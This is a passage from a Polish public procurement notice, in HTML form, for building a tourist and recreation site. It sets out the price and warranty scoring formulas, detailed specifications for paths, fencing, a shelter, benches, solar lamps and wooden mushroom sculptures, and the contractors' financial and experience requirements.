kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>Cn<br/>C = ------------ x 60 pkt<br/>Co<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w formularzu Oferty dla<br/>danej Części zamówienia (załącznik nr 2 do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do<br/>powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i<br/>usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od<br/>towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>2) W ramach kryterium „Okres gwarancji jakości” ocena ofert zostanie dokonana w następujący<br/>sposób:<br/>a) W ramach kryterium „Okres gwarancji jakości” ocenie będzie podlegać okres gwarancji wyrażony w<br/>pełnych miesiącach zdeklarowany przez Wykonawcę w formularzu Oferty stanowiącym załącznik nr 2<br/>do SWZ.<br/>b) Zamawiający wskazuje, że minimalny okres gwarancji jakości wynosi 36 miesięcy od daty,<br/>końcowego protokołu odbioru robót. Jeżeli Wykonawca zaoferuje krótszy okres gwarancji, jego oferta<br/>zostanie uznana za niezgodną z warunkami zamówienia i będzie podlegać odrzuceniu.<br/>c) Maksymalny okres gwarancji przyjęty do oceny ofert wynosi 60 miesięcy, co oznacza, że w<br/>przypadku zaoferowania okresu gwarancji na dłuższy okres niż 60 miesięcy do oceny w ramach<br/>kryterium oceny ofert przyjęty zostanie 60 miesięczny okres gwarancji, przy czym do Umowy jako<br/>zobowiązanie Wykonawcy zostanie przyjęty okres gwarancji wskazany w Ofercie.<br/>d) W przypadku braku podania w Ofercie okresu gwarancji, Zamawiający uzna, że Wykonawca<br/>zapewnia minimalną długość okresu wymaganą przez Zamawiającego.<br/>e) W ramach kryterium „Okres gwarancji jakości” Wykonawca może otrzymać maksymalnie 40 pkt.<br/>f) W ramach kryterium „Okres Gwarancji” sposób przyznania punktów będzie dokonany przy<br/>zastosowaniu wzoru:<br/>Go<br/>G = ------------ x 40 pkt<br/>Gn<br/>gdzie:<br/>G – liczba punktów w ramach kryterium „Okres gwarancji jakości”,<br/>Gn – najdłuższy zaoferowany okres gwarancji jakości,<br/>Go – Okres gwarancji jakości oferty ocenianej.<br/>Za najkorzystniejszą ofertę, w danej Części; uznana zostanie Oferta Wykonawcy, która uzyska<br/>największą liczbę punktów w w/w kryteriach oceny ofert. Oferta może uzyskać maksymalnie 100<br/>punktów.<br/>Jeżeli nie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert<br/>przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych<br/>ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. Jeżeli oferty otrzymały<br/>taką samą ocenę w kryterium o najwyżej wadze, Zamawiający wybiera ofertę z najniższą ceną. Jeżeli<br/>nie można dokonać wyboru oferty w sposób, o którym mowa w zdaniu poprzednim, Zamawiający<br/>wzywa do wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez<br/>Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Ocena ofert zostanie dokonana oddzielnie dla każdej Części.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zagospodarowanie wyznaczonego obszaru na cele turystyczno-rekreacyjne. Teren<br/>przeznaczony na cele edukacyjne i rekreacyjne wydzielony zostanie niskim ogrodzeniem<br/>drewnianym.<br/>1) Przewiduje się wykonanie:<br/>- Ścieżek o szerokości ok. 1,50 m oraz miejscowo 2,00 m o nawierzchni z kruszywa łamanego,<br/>łączna powierzchnia ścieżek to około 343 m². Konstrukcja nawierzchni:<br/>a) grunt rodzimy zagęszczony w korycie głębokości co najmniej 10 cm.<br/>b) geowłóknina o właściwościach filtracyjnych i odsączających<br/>c) kruszywo łamane sortowane 2 - 8 mm grubości co najmniej 10 cm zagęszczone.<br/>- Nawierzchni do zabaw ruchowych o wymiarach około 8 x 16 m. Przewiduje się osadzenie 2<br/>słupków przystosowanych do montażu siatki (miejsce ma spełniać funkcję jako boisko do<br/>siatkówki). Miejsce wyznaczone liniami bocznymi za pomocą taśmy w kolorze ciemnoniebieskim<br/>o szerokości 5-6 cm. Taśma wyznaczy pole do zabaw ruchowych o wymiarach 8x16 m Taśma<br/>przymocowana na stałe do podłoża. Przewiduje się montaż dwóch słupków, na których<br/>zawieszona ma być siatka. Przyjęto słupki z osłonami wykonane z aluminium lub stalowe.<br/>Przekrój słupka powinien być kołem lub kwadratem o wymiarach około 80x80mm. Wysokość<br/>słupka około 2,55 m. Słupki powinny być przytwierdzone do podłoża za pośrednictwem tulei<br/>montażowych lub kotew ulokowanych w gruncie na zaprawie betonowej B20, w odległości 0,7-1<br/>m od linii taśmy przy czym odległość od linii taśmy do osłony słupka powinna być taka sama po<br/>obu stronach miejsca zabaw ruchowych.<br/>- Ogrodzenia z dwoma szlabanami. Ogrodzenie - balustrada wykonana z drewna toczonego.<br/>Słupki o średnicy co najmniej 15 cm z drewna akacjowego lub dębowego o wysokości co<br/>najmniej 100 cm powyżej poziomu gruntu. Słupki powinny być zakotwione w gruncie na<br/>głębokość co najmniej 50 cm. Elementy poziome i skośne balustrady o średnicy co najmniej 12<br/>cm wykonane z drewna świerkowego o dł. ok. 2,60-2,80 m. Drewno impregnowane dwukrotnie w<br/>kolorze typu „palisander królewski”. Łączna długość przedmiotowego ogrodzenia wynosi około<br/>233 mb.<br/>Szlabany - wykonane z drewna toczonego. Słupki o średnicy co najmniej 15 cm z drewna<br/>akacjowego lub dębowego o wysokości co najmniej 100 cm powyżej poziomu gruntu. Słupki<br/>powinny być zakotwione w gruncie na głębokość co najmniej 50 cm. Poprzeczki szlabanów o<br/>średnicy co najmniej 10 cm, wykonane z drewna świerkowego o dł. ok. 5,25 m. Drewno<br/>impregnowane dwukrotnie w kolorze typu „palisander królewski”.<br/>- Jednego zadaszenia stanowiącego ochronę przed deszczem i słońcem wykonanego na planie<br/>kwadratu. Słupy ( o wymiarach 15cm x 15 cm ) w odległościach osiowych 3,5 m x 3,5 m,<br/>wysokość całkowita obiektu ok. 3,80 m. Konstrukcja wykonana z drewna sosnowego C 24,<br/>struganego. Fundamenty wykonane z betonu C 125/30, zbrojone stalą A-IIIN i A-0. Dach<br/>czterospadowy pokryty blachą stalową, powlekaną w kolorze ciemny popiel, ułożona na rąbek<br/>stojący, poniżej znajdować się będzie membrana dachowa oraz deskowanie na pióro i wpust.<br/>Elementy drewniane wykończone zostaną dwukrotnie środkiem ochronno-dekoracyjnym w kolorze typu „palisander królewski”. Stalowe elementy kotwiące ocynkowane ogniowo.<br/>Wewnątrz zadaszenia znajdował się będzie stół oraz trzy ławki z oparciem.<br/>- Pięciu tablic (edukacyjnych i informacyjnych)., Tablice wykonane na podłożu z blachy<br/>ocynkowanej o wymiarach 135x100 cm (poziom) zabezpieczone warstwą ochronną UV oraz<br/>antygraffiti. Stelaże tablic będą zawierać pełne deskowanie oraz będzie osadzony na dwóch<br/>słupach. Stelaże do tablic wykonane z drewna modrzewiowego dwukrotnie impregnowanego, w<br/>kolorze typu „palisander królewski” Stelaże zostaną wyposażone w daszek dwustronny,<br/>zabezpieczającym przed opadami atmosferycznymi, podłużnie deskowanym – zachodzącym na<br/>siebie, zakładka min. 2,5 cm. Słupy stelaży zakończone ocynkowanymi kotwami ulokowanymi w<br/>gruncie na zaprawie betonowej B20. Wykonawca zapewni autorskie opracowanie merytoryczne i<br/>graficzne tablic. Każda z nich zawierać będzie tekst oraz indywidualnie dopasowane: zdjęcia,<br/>i/lub: schematy, mapy, logotypy, piktogramy itp., Wykonawca zobowiązany będzie przenieść na<br/>zamawiającego prawa autorskie. Treści, fotografie oraz pozostałe elementy graficzne<br/>umieszczane na tablicy będą uzgadniane z Zamawiającym, który może również złożyć swoje<br/>propozycje. Wszystkie fotografie oraz pozostałe elementy graficzne muszą być rzetelnie<br/>udokumentowane pod względem ich pochodzenia.<br/>Wszystkie konstrukcje drewniane dwukrotnie zabezpieczone środkiem ochronnym do<br/>impregnacji zewnętrznej drewna, w celu skutecznej metody ochrony drewna przed działaniem<br/>wilgoci, promieniowaniem UV , szkodnikami, grzybami oraz sinizną<br/>Zamawiający nie wyposaża w materiały tematyczne potrzebne do wykonania plansz tablic (t. j.<br/>teksty, zdjęcia, grafiki). Wykonawca przedstawi Zamawiającemu projekty plansz w celu ustalenia<br/>ewentualnych poprawek lub jej akceptacji.<br/>- Siedmiu ławek drewnianych z oparciem. Ławki wykonane z litego drewna świerkowego lub<br/>modrzewiowego, impregnowanego, mocowane do podłoża za pomocą ocynkowanych<br/>płaskowników. Dolny element ławki przylegający bezpośrednio do podłoża wykonany będzie z<br/>drewna dębowego lub robinii akacjowej. Ławki zostaną zabezpieczone środkiem ochronnodekoracyjnym w kolorze typu „palisander królewski”. Zamawiający dopuszcza zastosowanie<br/>podobnego produktu niż opisany w dokumentacji projektowej jednakże wyłącznie po uzyskaniu<br/>zgody Zamawiającego<br/>- Sześciu ławek bez oparcia. Ławki wykonane z litego drewna świerkowego lub modrzewiowego,<br/>impregnowanego, mocowane do podłoża za pomocą ocynkowanych płaskowników. Słupki ławki<br/>wykonane będą z drewna dębowego lub robinii akacjowej. Ławki zostaną zabezpieczone<br/>środkiem ochronno-dekoracyjnym w kolorze typu „palisander królewski”. Zamawiający<br/>dopuszcza zastosowanie podobnego produktu niż opisany w dokumentacji projektowej jednakże<br/>wyłącznie po uzyskaniu zgody Zamawiającego<br/>- Pięciu lamp solarnych + system wizyjny moc źródła światła ≥ 15 W, strumień świetlny minimum<br/>700 lm, panel solarny ≥150 W, napięcie 12V lub 24V, żywotność ≥ 50 000 h, akumulator żelowy<br/>o pojemności ≥150 Ah, czas autonomii - do 4 dni, temperatura pracy od -20°C do +60°C, czujnik<br/>ruchu ≥ 10 m, czas pracy 8-12 godzin, całkowita wysokość około 6 m, maszt z blachy stalowej<br/>ocynkowanej ogniowo, mocowany do prefabrykowanej stopy fundamentowej. sC<br/>- Trzech koszy na odpady wykonanych z drewna świerkowego lub modrzewiowego<br/>impregnowanego ciśnieniowo. Słupy, na których zamontowane będą kosze powinny być<br/>wykonane z drewna dębowego lub robinii akacjowej. Kosze powinny być wykonane w kształcie<br/>walca o średnicy około 40 cm, konstrukcja powinna mieć wysokość około 80 cm natomiast słupy<br/>powinny być wkopane na głębokość około 50 cm. Kosze zostaną zabezpieczone środkiem<br/>ochronno-dekoracyjnym w kolorze typu „palisander królewski”.<br/>- Jednego paleniska wykonanego z kamienia polnego w postaci okręgu o średnicy około 1 m<br/>- Montaż czterech ławostołów wykonanych z litego drewna świerkowego lub modrzewiowego,<br/>impregnowanego. Ławostoły zostaną zabezpieczone środkiem ochronno-dekoracyjnym w<br/>kolorze typu „palisander królewski”.<br/>- Montaż zestawu sześciu rzeźb grzybów leśnych. Zestaw będzie zawierał rzeźby następujących<br/>grzybów:<br/>1) borowik brunatny<br/>2) borowik szlachetny<br/>3) czubajka kania<br/>4) pieprznik jadalny (kurka)<br/>5) muchomor czerwony<br/>6) koźlarz pomarańczowożółty<br/>Każda z rzeźb będzie o wysokości ok. 50 cm, średnica kapelusza w zależności od gatunku: 35 -<br/>50 cm, podstawa: grubość około 5 cm, szerokość ok. 35 cm<br/>Wszystkie rzeźby wykonane będą z litego drewna lipowego sezonowanego, rzeźbionego (każda<br/>z rzeźb składać się będzie z 3 litych elementów: kapelusza, trzonu i podstawy) Drewno do<br/>wykonania rzeźb powinno być powietrzno-suche lub suche aby zapobiec spękaniom, które mogą<br/>stanowić zagrożenie w kontakcie z dziećmi. Każda z rzeźb umieszczona zostanie na min. 1-2<br/>kotwach w zależności od kształtu i wielkości. Kotwy o długości min. 70cm do 100 cm w<br/>zależności od ciężaru rzeźby. Kotwa powinna być wkopana na głębokość min. 60-70 cm i<br/>zabetonowana w gruncie w celu dodatkowego wypoziomowania i ustabilizowania rzeźby.<br/>Wymagany beton - B20.<br/>przy każdej z rzeźb znajdować się będzie tabliczka gatunkowa w formacie min. A3, podkład:<br/>blacha ocynkowana o grubości min. 0,7 mm lub tworzywa dibbond. Tablica odeskowana<br/>(drewno świerkowe lub modrzewiowe), usytuowana pod katem 45⁰, usadowiona na słupku<br/>nośnym wykonanym z drewna dębowego lub robinii akacjowej, toczonego o średnicy 8-10 cm,<br/>wkopana i zakończona kotwą </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 153294,15 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111291-4 - Roboty w zakresie zagospodarowania terenu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32323500-8 - Urządzenia do nadzoru wideo</p> <p class="mb-0">34928530-2 - Latarnie uliczne</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45211320-8 - Roboty budowlane w zakresie altan</p> <p class="mb-0">45223800-4 - Montaż i wznoszenie gotowych konstrukcji</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert w każdej Części zamówienia Zamawiający będzie się<br/>kierował następującymi kryteriami oceny ofert:<br/>1) Cena – 60 %<br/>2) Okres gwarancji jakości – 40%<br/>Maksymalna liczba punktów w kryteriach równa jest określonej wadze dla tych kryteriów w %.<br/>Sposób obliczania punktów:<br/>1) W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>Cn<br/>C = ------------ x 60 pkt<br/>Co<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w formularzu Oferty dla<br/>danej Części zamówienia (załącznik nr 2 do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do<br/>powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i<br/>usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od<br/>towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>2) W ramach kryterium „Okres gwarancji jakości” ocena ofert zostanie dokonana w następujący<br/>sposób:<br/>a) W ramach kryterium „Okres gwarancji jakości” ocenie będzie podlegać okres gwarancji wyrażony w<br/>pełnych miesiącach zdeklarowany przez Wykonawcę w formularzu Oferty stanowiącym załącznik nr 2<br/>do SWZ.<br/>b) Zamawiający wskazuje, że minimalny okres gwarancji jakości wynosi 36 miesięcy od daty,<br/>końcowego protokołu odbioru robót. Jeżeli Wykonawca zaoferuje krótszy okres gwarancji, jego oferta<br/>zostanie uznana za niezgodną z warunkami zamówienia i będzie podlegać odrzuceniu.<br/>c) Maksymalny okres gwarancji przyjęty do oceny ofert wynosi 60 miesięcy, co oznacza, że w<br/>przypadku zaoferowania okresu gwarancji na dłuższy okres niż 60 miesięcy do oceny w ramach<br/>kryterium oceny ofert przyjęty zostanie 60 miesięczny okres gwarancji, przy czym do Umowy jako<br/>zobowiązanie Wykonawcy zostanie przyjęty okres gwarancji wskazany w Ofercie.<br/>d) W przypadku braku podania w Ofercie okresu gwarancji, Zamawiający uzna, że Wykonawca<br/>zapewnia minimalną długość okresu wymaganą przez Zamawiającego.<br/>e) W ramach kryterium „Okres gwarancji jakości” Wykonawca może otrzymać maksymalnie 40 pkt.<br/>f) W ramach kryterium „Okres Gwarancji” sposób przyznania punktów będzie dokonany przy<br/>zastosowaniu wzoru:<br/>Go<br/>G = ------------ x 40 pkt<br/>Gn<br/>gdzie:<br/>G – liczba punktów w ramach kryterium „Okres gwarancji jakości”,<br/>Gn – najdłuższy zaoferowany okres gwarancji jakości,<br/>Go – Okres gwarancji jakości oferty ocenianej.<br/>Za najkorzystniejszą ofertę, w danej Części; uznana zostanie Oferta Wykonawcy, która uzyska<br/>największą liczbę punktów w w/w kryteriach oceny ofert. Oferta może uzyskać maksymalnie 100<br/>punktów.<br/>Jeżeli nie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert<br/>przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych<br/>ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. Jeżeli oferty otrzymały<br/>taką samą ocenę w kryterium o najwyżej wadze, Zamawiający wybiera ofertę z najniższą ceną. Jeżeli<br/>nie można dokonać wyboru oferty w sposób, o którym mowa w zdaniu poprzednim, Zamawiający<br/>wzywa do wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez<br/>Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Ocena ofert zostanie dokonana oddzielnie dla każdej Części.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku<br/>zdolności do występowania w obrocie gospodarczym<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku<br/>posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>3) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie formułuje szczególnych wymagań w zakresie opisu spełnienia warunku udziału<br/>w postępowaniu w odniesieniu do warunku dotyczącego sytuacji ekonomicznej.<br/>Warunek w odniesieniu do sytuacji finansowej zostanie spełniony jeśli Wykonawca wykaże, że<br/>posiada środki finansowe lub zdolność kredytową o wartości nie mniejszej niż:<br/>Dla części nr 1 – 30 000 zł (słownie: dwadzieścia pięć tysięcy zł ),<br/>Dla części nr 2 – 75 000 zł (słownie: siedemdziesiąt pięć tysięcy zł ).<br/>Uwaga:<br/>W przypadku złożenia przez Wykonawcę oferty na więcej niż jedną część warunek dotyczący<br/>sytuacji finansowej sumuje się.<br/>4) zdolności technicznej lub zawodowej.<br/>Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat liczonych wstecz od dnia, w którym upływa termin składania<br/>ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonał co najmniej<br/>jedną robotę budowlaną (przy czym przez jedną robotę budowlaną należy rozumieć roboty<br/>wykonane na podstawie jednej umowy) polegającą na budowie infrastruktury turystycznej o<br/>wartości nie mniejszej niż:<br/>Dla części nr 1 – 30 000 zł (słownie: trzydzieści tysięcy zł ),<br/>Dla części nr 2 – 75 000 zł (słownie: siedemdziesiąt pięć tysięcy zł ),<br/>Przez małą infrastrukturę turystyczną Zamawiający rozumie:<br/>• konstrukcje na stelażach wykonanych ze słupów, żerdzi lub drewnianych bali (np. tablice<br/>informacyjne, witacze, drogowskazy, ogrodzenia) i/lub<br/>• konstrukcje z bali drewnianych/desek drewnianych (np. wiaty, ławki, stoły, ławy, ławostoły,<br/>stojaki na rowery, kosze na śmieci). i/lub<br/>• wykonanie ścieżek pieszych i rowerowych o nawierzchni z kruszywa łamanego<br/>W przypadku złożenia przez Wykonawcę ofert na więcej niż jedną część warunek dotyczący<br/>zdolności technicznej lub zawodowej zostaje uznany za spełniony w przypadku gdy Wykonawca<br/>wykaże spełnianie warunku co najmniej dla Części nr 2.<br/>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą<br/>„spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach, o<br/>których mowa w rozdziale 9.<br/>Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z<br/>postępowania. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>warunki udziału w postępowaniu określone w pkt 7.1. SWZ powinni spełniać łącznie wszyscy<br/>Wykonawcy.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych Wykonawców, którzy wykonają roboty budowlane, do realizacji których te<br/>zdolności są wymagane. W przypadku, o którym mowa w pkt 7.1. ppkt 4) SWZ Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego<br/>wynika, które roboty budowlane wykonają poszczególni Wykonawcy.<br/>Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, polegać<br/>na zdolnościach technicznych lub zawodowych lub sytuacji finansowej podmiotów<br/>udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków<br/>prawnych. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających<br/>zasoby, jeśli podmioty te wykonają roboty budowlane, do realizacji, których te zdolności są<br/>wymagane.<br/>Zamawiający ocenia, czy udostępniane Wykonawcy przez podmioty udostępniające zasoby<br/>zdolności techniczne lub zawodowe lub ich sytuacja finansowa pozwalają na wykazanie przez<br/>Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w pkt 7.1. ppkt 3) i<br/>4) SWZ, a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które<br/>zostały przewidziane w pkt 6.1. i 6.3. SWZ względem Wykonawcy.<br/>Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z Wykonawcą,<br/>który polega na jego sytuacji finansowej, za szkodę poniesioną przez Zamawiającego powstałą<br/>wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów podmiot ten<br/>nie ponosi winy.<br/>Jeżeli zdolności techniczne lub zawodowe, sytuacja finansowa podmiotu udostępniającego<br/>zasoby nie potwierdzają spełniania przez Wykonawcę warunków udziału w postępowaniu lub<br/>zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda, aby Wykonawca w<br/>terminie określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub<br/>podmiotami albo wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub<br/>sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach podmiotów udostępniających zasoby. <br/>Oceniając zdolność techniczną lub zawodową Wykonawcy, Zamawiający działając na podstawie<br/>art. 116 ust. 2 PZP w zw. z art. 266 PZP może, na każdym etapie postępowania, uznać, że<br/>Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę<br/>sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć<br/>negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu, o<br/>których mowa w pkt 7.1. SWZ Zamawiający działając na podstawie art. 274 ust. 1 PZP wezwie<br/>Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych<br/>środków dowodowych:<br/>a) informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość<br/>posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym<br/>niż 3 miesiące przed jej złożeniem.<br/>Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych przez Zamawiającego<br/>podmiotowych środków dowodowych, o których mowa w pkt 9.2. lit. a) powyżej, Wykonawca składa<br/>inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego<br/>przez Zamawiającego warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub<br/>finansowej.<br/>b) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane (wzór wykazu<br/>wykonanych robót budowlanych stanowi załącznik nr 7 do SWZ).<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych<br/>wspólnie z innymi wykonawcami, wykaz, o którym mowa wyżej dotyczy robót budowlanych, w których<br/>wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>Okres wyrażony w latach, o którym mowa wyżej, liczy się wstecz od dnia w którym upływa termin<br/>składnia ofert.<br/>c) dowodów określających, że wskazane przez Wykonawcę roboty budowlane na potwierdzenie<br/>spełnienia warunku udziału w postępowaniu dot. zdolności technicznej lub zawodowej w zakresie<br/>doświadczenia zostały wykonane należycie.<br/>Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego<br/>nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>W celu potwierdzenia braku podstaw do wykluczenia z postępowania, o których mowa w pkt 6.1. i 6.3.<br/>oraz w celu potwierdzenia spełniania warunków udziału w postępowaniu, o których mowa w pkt 7.1.<br/>Wykonawca składa wraz z ofertą oświadczenia, o których mowa w art. 125 ust. 1 PZP, tj.<br/>- oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone zgodnie ze wzorem<br/>stanowiącym załącznik nr 3A do SWZ oraz<br/>- oświadczenie o braku podstaw do wykluczenia, sporządzone zgodne ze wzorem stanowiącym<br/>załącznik nr 3B do 